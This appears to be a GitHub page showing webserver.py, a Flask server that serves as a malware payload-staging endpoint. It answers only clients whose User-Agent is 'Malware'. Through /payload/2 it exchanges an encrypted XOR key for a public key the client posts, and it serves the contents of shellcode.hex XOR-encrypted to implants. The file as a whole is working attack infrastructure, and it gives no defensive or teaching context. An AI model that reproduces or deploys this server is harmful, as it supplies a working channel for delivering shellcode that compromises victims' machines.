-
Notifications
You must be signed in to change notification settings - Fork 0
/
webserver.py
52 lines (41 loc) · 1.87 KB
/
webserver.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from flask import Flask, request, send_file, abort, Response
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from wincrypto import CryptImportKey, CryptEncrypt, CryptGetKeyParam, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptExportKey
from wincrypto.constants import CALG_SHA1, CALG_AES_256, bType_SIMPLEBLOB, bType_PUBLICKEYBLOB
app = Flask(__name__)
secret = "736563726574"
def xor(data, key):
return bytes(a ^ b for a, b in zip(data, key * (len(data) // len(key))))
@app.before_request
def check_user_agent():
user_agent = request.headers.get('User-Agent')
if user_agent != 'Malware':
abort(403)
@app.route('/payload/<int:id>', methods=['POST', 'GET'])
def payload(id):
if id == 2 and request.method == 'POST':
print("request received from : ", request.remote_addr)
print("public key received : ", request.data)
public_key = request.data
rsa_pub_key = CryptImportKey(public_key)
bytes_secret = bytes.fromhex(secret)
encrypted_xor_key = CryptEncrypt(rsa_pub_key, bytes_secret)
print("len of enc :", len(encrypted_xor_key))
print("encrypted_xor_key : ", encrypted_xor_key)
return encrypted_xor_key
elif id == 2 and request.method == 'GET':
print("request received from : ", request.remote_addr, " on the GET method")
with open('shellcode.hex', 'rb') as f:
message = f.read()
bytes_secret = bytes.fromhex(secret)
encrypted_message = xor(message, bytes_secret)
print("encrypted : ", encrypted_message)
print("len encrypted : ", len(encrypted_message))
print("decrypted : ", xor(encrypted_message, bytes_secret))
return encrypted_message
else:
return 'No payload for id {}'.format(id)
if __name__ == '__main__':
app.debug = True
app.run(host='0.0.0.0', port=5001)